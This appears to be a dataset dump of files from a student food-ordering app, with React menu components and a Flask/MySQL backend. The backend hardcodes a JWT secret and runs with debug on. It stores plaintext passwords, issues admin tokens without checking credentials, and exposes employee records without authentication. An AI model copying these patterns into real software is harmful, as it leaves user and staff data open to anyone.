</div>\n </div>\n </div>\n </div>\n\n <div className = \"container\" id = \"section-2-gradient\">\n <h1>Choose foods that range all the way from Breakfast to Dinner!</h1>\n <center>\n <img src = {Bacon_wrap}></img>\n <img src = {Smoke_salmon}></img>\n <img src = {Truffle_gnocchi}></img>\n </center>\n </div>\n </div> \n );\n }\n}\n" }, { "alpha_fraction": 0.39059537649154663, "alphanum_fraction": 0.4019719362258911, "avg_line_length": 25.636363983154297, "blob_id": "99e21b9cbb6ff5eaeb934db630f5896da57699d2", "content_id": "f7b27f23c87c81f4f4942ba020224b7f8838bb9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2637, "license_type": "no_license", "max_line_length": 63, "num_lines": 99, "path": "/src/components/Beverages.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react'\nimport FoodProfile from './FoodProfile'\nimport Green_icedtea from './../images/Green_icedtea.jpg'\nimport Lemonade from './../images/Lemonade.jpg'\nimport Mango_lassi from './../images/Mango_lassi.jpg'\nimport Matcha_latte from './../images/Matcha_latte.jpg'\nimport Orange_juice from './../images/Orange_juice.jpg'\nimport Pina_colada from './../images/Pina_colada.jpg'\nimport Pineapple_lassi from './../images/Pineapple_lassi.jpg'\nimport Strawberry_shake from './../images/Strawberry_shake.jpg'\nimport Thai_icedtea from './../images/Thai_icedtea.jpg'\n\nfunction Beverages() {\n return (\n <div>\n \n <div className=\"row\">\n <div className=\".col-4\">\n <FoodProfile \n imgUrl = {Green_icedtea} \n name = \"Green Icedtea\"\n price = \"$7.75\"\n />\n <br />\n <br />\n \n <FoodProfile \n imgUrl = {Lemonade}\n name = \" Lemonade\"\n price = \"$4.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Mango_lassi}\n name = \" Mango Lassi\"\n price = \"$9.75\"\n />\n\n\n </div>\n <div className=\".col-4\">\n <br></br>\n \n <FoodProfile \n imgUrl = {Matcha_latte}\n name = \"Matcha Latte\"\n price = \"$9.99\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Orange_juice}\n name = \"Orange Juice\"\n price = \"$3.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Pina_colada}\n name = \"Pina Colada\"\n price = \"$9.75\"\n />\n\n </div>\n <div className=\".col-4\">\n <br></br>\n <FoodProfile \n imgUrl = {Pineapple_lassi}\n name = \"Pineapple Lassi\"\n price = \"$9.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Strawberry_shake}\n name = \" Strawberry Shake\"\n price = \"$9.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Thai_icedtea}\n name = \"Thai Icedtea\"\n price = \"$7.75\"\n />\n\n </div>\n </div>\n </div>\n )\n}\n\nexport default Beverages\n" }, { "alpha_fraction": 0.44233378767967224, "alphanum_fraction": 0.4464043378829956, "avg_line_length": 22.80645179748535, "blob_id": "a3148a7b8dfdee9771fe28b695a8d28b7eb7eec0", "content_id": "e960e4626f1b2406e5014c4498241c295ceef3f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 737, "license_type": "no_license", "max_line_length": 82, "num_lines": 31, "path": "/src/components/FoodProfile.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React, {useState} from 'react'\nimport Ratings from './Ratings'\n\nfunction FoodProfile(props) {\n const imgStyle = {\n position:'relative',\n left: '170px'\n\n }\n const [bag, setBag] = useState ([])\n\n\n return (\n <div>\n <img \n src = {props.imgUrl} \n style = {imgStyle}\n />\n <p style = {imgStyle}> {props.name} {props.price}</p>\n <table>\n <tr>\n <th><div className=\"ratting\"> <Ratings/></div></th>\n <th><button className=\"AddtocartBtn\">Add to cart</button></th>\n </tr> \n </table>\n \n </div>\n )\n}\n\nexport default FoodProfile" }, { "alpha_fraction": 0.5613718628883362, "alphanum_fraction": 0.5613718628883362, "avg_line_length": 28.052631378173828, "blob_id": "58517618d7d792995005616b3de8255a3515e8a5", "content_id": "f5687f02e56274d044200e4a76ec56bf87524d47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 554, "license_type": "no_license", "max_line_length": 81, "num_lines": 19, "path": "/src/components/ProtectedRoute.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React, { useContext } from \"react\";\nimport { Redirect, Route } from \"react-router-dom\";\nimport { AuthContext } from \"./auth\";\n\n\n// This accepts Component as a prop and all other props of that component as rest\nexport const ProtectedRoute = ({ component: Component, ...rest }) => {\n const { token } = useContext (AuthContext)\n\n return (\n <Route {...rest} render = {(props) => \n token ? (\n // <Component {...props} />\n <Redirect to = '/records' />\n ): (\n <Redirect to = '/admin' />\n )}/>\n );\n };\n " }, { "alpha_fraction": 0.45943397283554077, "alphanum_fraction": 0.46226415038108826, "avg_line_length": 20.219999313354492, "blob_id": "a4edb2a41980e1ff0cff103d69920729a6ca4772", "content_id": "3e00526f6c82176835436c1609db7b2233b99818", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1060, "license_type": "no_license", "max_line_length": 52, "num_lines": 50, "path": "/src/components/Sidebar.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react';\nimport {Link} from 'react-router-dom'\nimport { elastic as Menu } from 'react-burger-menu';\nimport './../App.css'\nimport './../Sidebar.css'\n\nexport default props => {\n return (\n <Menu width = {150}>\n <Link to = '/appetizer'>\n <a className=\"menu-item\" href=\"/appetizer\">\n Appetizer\n </a>\n </Link>\n \n <Link to = '/breakfast'>\n <a className=\"menu-item\" href=\"/breakfast\">\n Breakfast\n </a>\n </Link>\n \n <Link to = '/lunch'>\n <a className=\"menu-item\" href=\"/lunch\">\n Lunch\n </a>\n </Link>\n \n <Link to = '/dinner'>\n <a className=\"menu-item\" href=\"/dinner\">\n Dinner\n </a>\n </Link>\n \n \n \n <Link to = \"/beverages\">\n <a className=\"menu-item\" href=\"/beverages\">\n Beverages\n </a>\n </Link>\n \n <Link to = \"/specials\">\n <a className=\"menu-item\" href=\"/specials\">\n Specials\n </a>\n </Link>\n \n </Menu>\n );\n};" }, { "alpha_fraction": 0.5950621962547302, "alphanum_fraction": 0.6098366975784302, "avg_line_length": 30.175758361816406, "blob_id": "85b1e59ab086f009bc76941073608b762eae642c", "content_id": "df2cbef0f5697aa5a09524d874d146f865e2bc7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5144, "license_type": "no_license", "max_line_length": 150, "num_lines": 165, "path": "/flaskapp/app.py", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request, redirect, jsonify, make_response\nfrom flask_mysqldb import MySQL\nfrom functools import wraps\nimport yaml\nimport jwt\nimport datetime\n\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\napp.config['SECRET_KEY'] = 'ThisIsSecretKey'\n\n# Configure DB\nwith open(r'db.yaml') as file:\n db = yaml.load(file, Loader=yaml.FullLoader)\n\n\napp.config['MYSQL_HOST'] = db['mysql_host']\napp.config['MYSQL_USER'] = db['mysql_user']\napp.config['MYSQL_PASSWORD'] = db['mysql_password']\napp.config['MYSQL_DB'] = db['mysql_db']\n\nmysql = MySQL(app)\n\n\[email protected]('/')\ndef home():\n return '''<h1>Welcome to Foodinit</h1>'''\n\n# this is for user to sign up\n\n\[email protected]('/signup', methods=[\"POST\", \"GET\"])\ndef signUp():\n if request.method == \"POST\":\n userInfo = request.form\n first_name = userInfo['fname']\n last_name = userInfo['lname']\n email = userInfo['email']\n password = userInfo['password']\n\n print('email')\n cur = mysql.connection.cursor()\n cur.execute(\"INSERT INTO Customer(first_name, last_name, phone, funds, total_spendings, email_id, pass) VALUES (%s, %s, %s, %s, %s, %s, %s )\",\n (first_name, last_name, '6315528120', '50.00', '0.00', email, password))\n mysql.connection.commit()\n cur.close()\n return redirect('http://localhost:3000')\n return render_template('index.html')\n\n\n# this is for user to sign in\[email protected]('/signin', methods=[\"GET\", \"POST\"])\ndef signIn():\n if request.method == \"POST\":\n userInfo = request.form\n email = userInfo[\"email\"]\n password = userInfo[\"password\"]\n\n cur = mysql.connection.cursor()\n resultSet = cur.execute(\n \"SELECT 1 FROM Customer WHERE email_id = %s AND pass = %s\", (email, password))\n\n if resultSet == 0:\n return redirect('http://localhost:3000/signin')\n return redirect('http://localhost:3000/menu')\n # return jsonify(\"Successfully logged in\")\n\n\ndef token_requred(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n # it will be something like http://localhost:5000/rouute?token=sdkjfvhbksdfhIUYHRASDKFCBD\n token = request.args.get('token')\n\n if not token:\n return jsonify({'Message': \"Token is missing\"}), 403\n try:\n data = jwt.decode(token, app.config['SECRET_KEY'])\n except:\n return jsonify({'Message': \"Token is invalid\"}), 403\n\n return f(*args, **kwargs)\n return decorated\n\n\n# this is for manager to login\[email protected]('/admin', methods=[\"POST\", \"GET\"])\ndef admin():\n\n if request.method == \"POST\":\n email = request.form.get(\"email\")\n password = request.form.get(\"password\")\n\n cur = mysql.connection.cursor()\n resultSet = cur.execute(\n \"SELECT 1 FROM Manager WHERE manager_email = %s AND manager_password = %s\", (email, password))\n\n # if resultSet == 0: # no match found with the given email and password\n # return redirect ('http://localhost:3000/admin')\n # else: # match found so now get a valid token\n token = jwt.encode({'user': email, 'exp': datetime.datetime.utcnow(\n ) + datetime.timedelta(seconds=120)}, app.config['SECRET_KEY'])\n return jsonify({'token': token.decode('UTF-8')})\n return make_response('Could not verify!', 401, {'WWW-Authenticate': 'Basic realm = \"Login Required\"'})\n\n\[email protected]('/getemployeerecords', methods=[\"GET\"])\ndef getEmployeeRecords():\n cur = mysql.connection.cursor()\n allEmployeeRecords = []\n\n cur.execute(\"SELECT * FROM Employee\")\n row = cur.fetchone()\n while row is not None:\n allEmployeeRecords.append(row)\n row = cur.fetchone()\n\n return jsonify(allEmployeeRecords)\n\n\n# ---------------------------------------------------------------\n# SOME PRACTICE THINGS DON\"T WORRY ABOUT IT\n\ndef token_requred(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n # it will be something like http://localhost:5000/rouute?token=sdkjfvhbksdfhIUYHRASDKFCBD\n token = request.args.get('token')\n\n if not token:\n return jsonify({'Message': \"Token is missing\"}), 403\n try:\n data = jwt.decode(token, app.config['SECRET_KEY'])\n except:\n return jsonify({'Message': \"Token is invalid\"}), 403\n\n return f(*args, **kwargs)\n return decorated\n\n\[email protected]('/unprotected')\ndef unprotected():\n return jsonify('Anyone can view this')\n\n\[email protected]('/protected')\n@token_requred\ndef protected():\n return jsonify('This is sensitive information, only authorized person can view this')\n\n\[email protected]('/login')\ndef login():\n auth = request.authorization\n\n if auth and auth.password == 'password':\n token = jwt.encode({'user': auth.username, 'exp': datetime.datetime.utcnow(\n ) + datetime.timedelta(seconds=60)}, app.config['SECRET_KEY'])\n return jsonify({'token': token.decode('UTF-8')})\n return make_response('Could not verify!', 401, {'WWW-Authenticate': 'Basic realm = \"Login Required\"'})\n\n\nif __name__ == '__main__':\n app.run(host='localhost', port=5000)\n" }, { "alpha_fraction": 0.39293763041496277, "alphanum_fraction": 0.40758827328681946, "avg_line_length": 25.88888931274414, "blob_id": "ccea8964cb77f7519e679c633b68a2a3281555f8", "content_id": "3b4e4043b431dfb431109963dedae8d8f954cb5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2662, "license_type": "no_license", "max_line_length": 65, "num_lines": 99, "path": "/src/components/Dinner.js", "repo_name": "akash395/Foodinit", "src_encoding": "UTF-8", "text": "import React from 'react'\nimport FoodProfile from './FoodProfile'\nimport Brussels_sprout from './../images/Brussels_sprout.jpg'\nimport Caeser_salad from './../images/Caeser_salad.jpg'\nimport Calamari from './../images/Calamari.jpg'\nimport Cauliflower_steak from './../images/Cauliflower_steak.jpg'\nimport Fettuccine_clams from './../images/Fettuccine_clams.jpg'\nimport Lobster_soup from './../images/Lobster_soup.jpg'\nimport Truffle_gnocchi from './../images/Truffle_gnocchi.jpg'\nimport Veal_meatball from './../images/Veal_meatball.png'\nimport Yellowfin_tuna from './../images/Yellowfin_tuna.jpg'\n\nfunction Dinner() {\n return (\n <div>\n \n <div className=\"row\">\n <div className=\".col-4\">\n <FoodProfile \n imgUrl = {Brussels_sprout} \n name = \"Brussels Sprout\"\n price = \"$18.50\"\n />\n <br />\n <br />\n \n <FoodProfile \n imgUrl = {Caeser_salad}\n name = \" Caeser Salad\"\n price = \"$19.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Calamari}\n name = \" Calamari\"\n price = \"$19.75\"\n />\n\n\n </div>\n <div className=\".col-4\">\n <br></br>\n \n <FoodProfile \n imgUrl = {Cauliflower_steak}\n name = \"Cauliflower Steak\"\n price = \"$19.99\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Fettuccine_clams}\n name = \"Fettuccine Clams\"\n price = \"$25.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Lobster_soup}\n name = \"Lobster Soup\"\n price = \"$29.75\"\n />\n\n </div>\n <div className=\".col-4\">\n <br></br>\n <FoodProfile \n imgUrl = {Truffle_gnocchi}\n name = \"Truffle Gnocchi\"\n price = \"$19.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Veal_meatball}\n name = \" Veal Meatball\"\n price = \"$19.75\"\n />\n <br />\n <br />\n <br />\n <FoodProfile \n imgUrl = {Yellowfin_tuna}\n name = \"Yellowfin Tuna\"\n price = \"$20.75\"\n />\n\n </div>\n </div>\n </div>\n )\n}\n\nexport default Dinner\n" } ]
16
rasperepodvipodvert/instabot
https://github.com/rasperepodvipodvert/instabot
0d5597caac02f31a70d126716823b9cc43b7586f
5b1ab9d86165ec32f2d30d55a66498b37de09226
07e5f3adbaa448732aa50242d25f4d18a49b58f2
refs/heads/master
2017-12-03T00:47:28.110936
2017-04-06T19:19:49
2017-04-06T19:19:49
85,699,846
0
0
null
2017-03-21T12:35:51
2017-03-21T11:56:22
2017-03-20T22:11:24
null
[ { "alpha_fraction": 0.6129032373428345, "alphanum_fraction": 0.6236559152603149, "avg_line_length": 30, "blob_id": "ee4297ad595c466777bb8c4a3485057a2f468b3e", "content_id": "b4c59e4bab1583c4960fefb5fe8792ffb5e1aa68", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 133, "license_type": "permissive", "max_line_length": 52, "num_lines": 3, "path": "/examples/telegram/config.py", "repo_name": "rasperepodvipodvert/instabot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Этот токен невалидный, можете даже не пробовать :)\ntoken = '271487422:AAHKDZDMF3CoDvlrH0p4pd2UhLpXlliC-Ho2'\n" }, { "alpha_fraction": 0.6021671891212463, "alphanum_fraction": 0.6060371398925781, "avg_line_length": 26.489360809326172, "blob_id": "3cbc7a6241ceafe63baef954ecc7dcf67dddd9c3", "content_id": "692513d265071fc49e75b98e83822056a06b9909", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1292, "license_type": "permissive", "max_line_length": 78, "num_lines": 47, "path": "/instabot/bot/bot_support.py", "repo_name": "rasperepodvipodvert/instabot", "src_encoding": "UTF-8", "text": "\"\"\"\n Support instabot's methods.\n\"\"\"\n\nimport sys\nimport os\nimport codecs\n\n\ndef check_if_file_exists(file_path):\n if not os.path.exists(file_path):\n print(\"Can't find '%s' file.\" % file_path)\n return False\n return True\n\n\ndef read_list_from_file(file_path):\n \"\"\"\n Reads list from file. One line - one item.\n Returns the list if file items.\n \"\"\"\n try:\n if not check_if_file_exists(file_path):\n open(file_path,'w').close()\n\n return []\n with codecs.open(file_path, \"r\", encoding=\"utf-8\") as f:\n content = f.readlines()\n if sys.version_info[0] < 3:\n content = [str(item.encode('utf8')) for item in content]\n content = [item.strip() for item in content if len(item) > 0]\n return content\n except Exception as e:\n print(str(e))\n return []\n\n\ndef add_whitelist(self, file_path):\n file_contents = read_list_from_file(file_path)\n self.whitelist = [self.convert_to_user_id(item) for item in file_contents]\n return not not self.whitelist\n\n\ndef add_blacklist(self, file_path):\n file_contents = read_list_from_file(file_path)\n self.blacklist = [self.convert_to_user_id(item) for item in file_contents]\n return not not self.blacklist\n" }, { "alpha_fraction": 0.5003182888031006, "alphanum_fraction": 0.5048897862434387, "avg_line_length": 40.741546630859375, "blob_id": "fdc5a1de0bb7e2bba1246de22002945160c80428", "content_id": "385984dab4ca8e77d929d1e135d242f889b836a1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17314, "license_type": "permissive", "max_line_length": 113, "num_lines": 414, "path": "/examples/telegram/tele_insta_bot.py", "repo_name": "rasperepodvipodvert/instabot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport traceback\nimport time\nimport sys\nimport os\nimport logging\nimport telebot\n\nsys.path.append(os.path.join(sys.path[0], '../../'))\nfrom examples.telegram import config\n\nsys.path.append(os.path.join(sys.path[0], '../../../'))\nfrom instabot import Bot\nfrom instabot.api import prepare\nfrom telebot import types\n\n\ntry:\n iBot = Bot(\n max_likes_per_day=1000,\n max_unlikes_per_day=1000,\n max_follows_per_day=1000,\n max_unfollows_per_day=350,\n max_comments_per_day=100,\n max_likes_to_like=50,\n max_followers_to_follow=500,\n min_followers_to_follow=10,\n max_following_to_follow=500,\n min_following_to_follow=10,\n max_followers_to_following_ratio=10,\n max_following_to_followers_ratio=2,\n min_media_count_to_follow=7,\n like_delay=10,\n unlike_delay=10,\n follow_delay=30,\n unfollow_delay=30,\n comment_delay=60,\n blacklist='blacklist.txt'\n ) # new instagram bot exemplar\n bot = telebot.TeleBot(config.token)\n telebot.logger.setLevel(logging.INFO)\n iBot.logger.setLevel(logging.DEBUG)\nexcept Exception as e:\n print('main exec:' + e)\n\n\nclass functions(object):\n queue_of_commands = {}\n mci = 0\n mid = 0\n hashtags_file_name = ''\n hashtags = []\n\n def iBot_login(login):\n try:\n if get_account_from_login(login) is True and iBot.isLoggedIn is False:\n # print(message.text.replace('/',''))\n iBot.login(username=login)\n return True\n else:\n return False\n except Exception as e:\n print(e)\n iBot.logout()\n listaccount()\n return False\n\n def get_user_img_url(username):\n \"\"\"\n Return a URL of profile img INSTAGRAM\n :return: URL\n \"\"\"\n return iBot.get_user_info(username)['hd_profile_pic_url_info']['url']\n\n def get_iBot_status(self):\n '''\n Get last 3 rous from instabot log file\n :return: str\n '''\n try:\n instabot_log_file = \"instabot.log\"\n log = open(instabot_log_file, \"r\").readlines()\n sent = ''\n i = 1\n if log:\n for i in range(3):\n sent = str(sent) + str(log[-i])\n\n return sent\n except Exception as e:\n print(e)\n return ''\n\n def send_iBot_status(self):\n try:\n sent = functions.get_iBot_status(self)\n bot.edit_message_text(chat_id=self.chat.id,\n message_id=self.message_id,\n text=sent,\n reply_markup=functions.keyboards.back_to_main_menu())\n except Exception as e:\n print(e)\n\n def like_hashtags(self):\n try:\n if functions.queue_of_commands.get('Like hashtags', 0) == 0 and len(functions.hashtags) > 0:\n for hashtag in functions.hashtags:\n iBot.like_hashtag(hashtag, amount=3)\n functions.queue_of_commands.pop('Like hashtags')\n else:\n bot.send_message(\n chat_id=self.chat.id,\n text='Nothing to like :(',\n reply_markup=functions.keyboards.like_hashtags())\n except Exception as e:\n print(e)\n\n @staticmethod\n def get_hashtags_from_file(username):\n \"\"\"\n Get hashtags from file username_hashtags.txt\n :return: \n \"\"\"\n functions.hashtags_file_name = '%s_hastags.txt' % iBot.username\n if not os.path.exists(functions.hashtags_file_name):\n open(functions.hashtags_file_name, 'w', encoding='utf8')\n with open(functions.hashtags_file_name, 'r', encoding='utf8') as f:\n for hashtag in f:\n functions.hashtags.append(hashtag.replace('\\n', ''))\n return True\n\n def get_hasgtags_from_user(self):\n \"\"\"\n TESTED!\n :return: ??? \n \"\"\"\n try:\n sent = bot.send_message(chat_id=self.chat.id,\n text='Please upload file',\n reply_markup=functions.keyboards.last_10_hashtags(self))\n # bot.register_next_step_handler(sent, functions.iBot_like_hashtags)\n except Exception as e:\n print('iBot_get_hasgtags: ' + e)\n\n class keyboards(object):\n \"\"\"\n This is custom keyboard for reply\n \"\"\"\n\n def last_10_hashtags(self):\n \"\"\"\n TESTED: keyboard for choose hashtags by click\n :return: keyboard\n \"\"\"\n try:\n keyboard = types.InlineKeyboardMarkup()\n if os.path.exists(functions.hashtags_file_name):\n with open(functions.hashtags_file_name, 'r', encoding='utf8') as f:\n for hashtag in f:\n button = types.InlineKeyboardButton(\n text=hashtag.replace('\\n', ''),\n callback_data='like:%s' % hashtag.replace('\\n', ''))\n keyboard.add(button)\n button = types.InlineKeyboardButton(\n text=\"⬅ Back\",\n callback_data='Like_hashtags'\n )\n keyboard.add(button)\n return keyboard\n except Exception as e:\n print('last_10_hashtags: ' + e)\n\n @staticmethod\n def choose_account():\n \"\"\"\n This is main keyboard for choose account for instabot works\n :return: keyboard\n \"\"\"\n keyboard = types.InlineKeyboardMarkup()\n for line in iBot.read_list_from_file(prepare.SECRET_FILE):\n account = line.split(':')[0]\n button = types.InlineKeyboardButton(text=account, callback_data='login:%s' % account)\n keyboard.add(button)\n return keyboard\n\n def main_menu(self):\n \"\"\"\n This is main function keyboard for instabot\n :return: keyboard\n \"\"\"\n try:\n keyboard = types.InlineKeyboardMarkup()\n b_Logout = types.InlineKeyboardButton(text=\"⬅ Back\", callback_data='Logout')\n b_Settings = types.InlineKeyboardButton(text=\"Settings\", callback_data='settings')\n b_BlockBots = types.InlineKeyboardButton(text=\"Block Bots\", callback_data='blockbots')\n\n b_Like_hashtags = types.InlineKeyboardButton(text=\"Like hashtags\", callback_data='Like_hashtags')\n b_Like_followers_of = types.InlineKeyboardButton(text=\"Like followers of\",\n callback_data='Like_followers_of')\n b_Like_following_of = types.InlineKeyboardButton(text=\"Like following of\",\n callback_data='Like_following_of')\n b_Like_your_timeline_feed = types.InlineKeyboardButton(text=\"Like your timeline feed\",\n callback_data='Like_your_timeline_feed')\n\n b_Follow_users_by_hashtags = types.InlineKeyboardButton(text=\"Follow users by hashtags\",\n callback_data='Follow_users_by_hashtags')\n keyboard.add(b_Logout, b_Settings)\n keyboard.add(b_Like_hashtags, b_BlockBots, b_Like_your_timeline_feed)\n\n return keyboard\n\n except Exception as e:\n bot.send_message(self.chat.id, e)\n\n @staticmethod\n def back_to_main_menu():\n \"\"\"\n This is menu for back to main menu\n :return: \n \"\"\"\n keyboard = types.InlineKeyboardMarkup()\n b_Back_to_menu = types.InlineKeyboardButton(text=\"⬅ Back\", callback_data='go_to_menu')\n b_send_status = types.InlineKeyboardButton(text=\"Status\", callback_data='status')\n keyboard.add(b_Back_to_menu, b_send_status)\n return keyboard\n\n @staticmethod\n def like_hashtags():\n keyboard = types.InlineKeyboardMarkup()\n b_Back_to_menu = types.InlineKeyboardButton(text=\"⬅ Back\", callback_data='go_to_menu')\n b_start_like = types.InlineKeyboardButton(text=\"Start Like\", callback_data='start_like')\n b_get_hashtags = types.InlineKeyboardButton(text=\"Enter hashtags\", callback_data='get_hashtags')\n keyboard.add(b_Back_to_menu, b_start_like)\n keyboard.add(b_get_hashtags)\n return keyboard\n\n pass\n\n class queue(object):\n list = []\n\n\[email protected]_handler(commands=['listaccount', 'start'])\ndef listaccount(message):\n try:\n functions.mci = message.chat.id\n if iBot.isLoggedIn is False:\n sent = 'MENU:\\n' \\\n ''\n bot.send_message(chat_id=functions.mci,\n text=sent,\n reply_markup=functions.keyboards.choose_account())\n except Exception as e:\n bot.send_message(functions.mci, e)\n\n\ndef get_account_from_login(login):\n try:\n accounts = iBot.read_list_from_file(prepare.SECRET_FILE)\n for line in accounts:\n username = line.split(':')[0]\n if username == login:\n return True\n exit()\n return False\n except Exception as e:\n bot.send_message(message.chat.id, e)\n\n\[email protected]_query_handler(func=lambda call: True)\ndef callback_inline(call):\n # Если сообщение из чата с ботом\n if call.message and iBot.isLoggedIn:\n print(call.data)\n if call.data == \"Logout\":\n if iBot.logout():\n bot.answer_callback_query(\n callback_query_id=call.id,\n show_alert=False,\n text='Bot is logout! \\n Please choose account...'\n )\n time.sleep(2)\n listaccount(call.message)\n if call.data == \"settings\":\n sent = 'max_likes_per_day = %s \\n ' \\\n 'max_unlikes_per_day = %s\\n' \\\n 'max_follows_per_day = %s\\n' \\\n 'max_unfollows_per_day = %s\\n' \\\n 'max_comments_per_day = %s\\n' \\\n 'max_likes_to_like = %s\\n' \\\n 'max_followers_to_follow = %s\\n' \\\n 'min_followers_to_follow = %s\\n' \\\n 'max_following_to_follow = %s\\n' \\\n 'min_following_to_follow = %s\\n' \\\n 'max_followers_to_following_ratio = %s\\n' \\\n 'max_following_to_followers_ratio = %s\\n' \\\n 'min_media_count_to_follow = %s\\n' \\\n 'like_delay = %s\\n' \\\n 'unlike_delay = %s\\n' \\\n 'follow_delay = %s\\n' \\\n 'unfollow_delay = %s\\n' \\\n 'comment_delay = %s\\n' \\\n 'stop_words = %s\\n' % (iBot.max_likes_per_day,\n iBot.max_unlikes_per_day,\n iBot.max_follows_per_day,\n iBot.max_unfollows_per_day,\n iBot.max_comments_per_day,\n iBot.max_likes_to_like,\n iBot.max_followers_to_follow,\n iBot.min_followers_to_follow,\n iBot.max_following_to_follow,\n iBot.min_following_to_follow,\n iBot.max_followers_to_following_ratio,\n iBot.max_following_to_followers_ratio,\n iBot.min_media_count_to_follow,\n iBot.like_delay,\n iBot.unlike_delay,\n iBot.follow_delay,\n iBot.unfollow_delay,\n iBot.comment_delay,\n str(iBot.stop_words))\n bot.edit_message_text(\n chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=sent,\n reply_markup=functions.keyboards.back_to_main_menu()\n )\n if call.data == \"blockbots\":\n functions.queue_of_commands.append(call.data)\n bot.edit_message_text(chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=str(functions.queue_of_commands),\n reply_markup=functions.keyboards.main_menu(call.message))\n iBot.block_bots()\n functions.queue_of_commands.remove(call.data)\n bot.edit_message_text(chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=str(functions.queue_of_commands),\n reply_markup=functions.keyboards.main_menu(call.message))\n if call.data == \"Like_your_timeline_feed\":\n functions.queue_of_commands.append(call.data)\n bot.edit_message_text(chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=str(functions.queue_of_commands),\n reply_markup=functions.keyboards.main_menu(call.message))\n iBot.like_timeline()\n functions.queue_of_commands.remove(call.data)\n bot.edit_message_text(chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=str(functions.queue_of_commands) + '\\n' + functions.get_iBot_status(),\n reply_markup=functions.keyboards.main_menu(call.message))\n if call.data == \"Like_hashtags\":\n functions.mci = call.message.message_id # may be used...\n bot.send_message(\n chat_id=call.message.chat.id,\n text=functions.get_iBot_status(call.message) + str(functions.hashtags),\n reply_markup=functions.keyboards.like_hashtags()\n )\n if call.data.split(':')[0] == 'like': # for hashtags from file\n hashtag = call.data.split(':')[1]\n functions.hashtags.append(hashtag)\n print(functions.hashtags)\n bot.edit_message_text(chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text='Please enter hasshtags: ' + str(functions.hashtags),\n reply_markup=functions.keyboards.last_10_hashtags(call.message))\n if call.data == 'get_hashtags': functions.get_hasgtags_from_user(call.message)\n if call.data == 'start_like': functions.like_hashtags(call.message)\n if call.data == \"go_to_menu\":\n bot.edit_message_text(\n chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=\"MENU:\",\n reply_markup=functions.keyboards.main_menu(call.message)\n )\n if call.data == 'status': functions.send_iBot_status(call.message)\n\n elif call.message and (call.message.chat.id > 0):\n if call.data.split(':')[0] == \"login\": # do after login\n username = call.data.split(':')[1]\n if functions.iBot_login(username):\n functions.get_hashtags_from_file(username)\n sent = '%s\\n%s' % (\n str(iBot.username).upper(),\n functions.get_user_img_url(username)\n )\n bot.edit_message_text(\n chat_id=call.message.chat.id,\n message_id=call.message.message_id,\n text=sent,\n reply_markup=functions.keyboards.main_menu(call.message)\n )\n else:\n bot.send_message(chat_id=call.message.chat.id,\n text='Please, login first!',\n reply_markup=functions.keyboards.choose_account())\n\n\ndef telegram_polling():\n try:\n bot.polling(none_stop=True, timeout=60) # constantly get messages from Telegram\n except:\n traceback_error_string = traceback.format_exc()\n print(traceback_error_string)\n # with open(\"Error.Log\", \"a\") as myfile:\n # myfile.write(\"\\r\\n\\r\\n\" + time.strftime(\n # \"%c\") + \"\\r\\n<<ERROR polling>>\\r\\n\" + traceback_error_string + \"\\r\\n<<ERROR polling>>\")\n bot.stop_polling()\n time.sleep(10)\n telegram_polling()\n\n\nif __name__ == '__main__':\n telegram_polling()\n" } ]
3
aidinhass/weatherpy
https://github.com/aidinhass/weatherpy
cd1f40213c4f6fd2381fda5337a2d77a08ee289c
6eff0531bc5c6919ec06f1b5dd3478a4d9ade68f
36407877461526649eccea3ecd8cf596a11ff78f
refs/heads/master
2020-03-18T16:01:04.507557
2018-06-26T00:25:14
2018-06-26T00:25:14
134,942,368
0
0
null
null
null
null
null
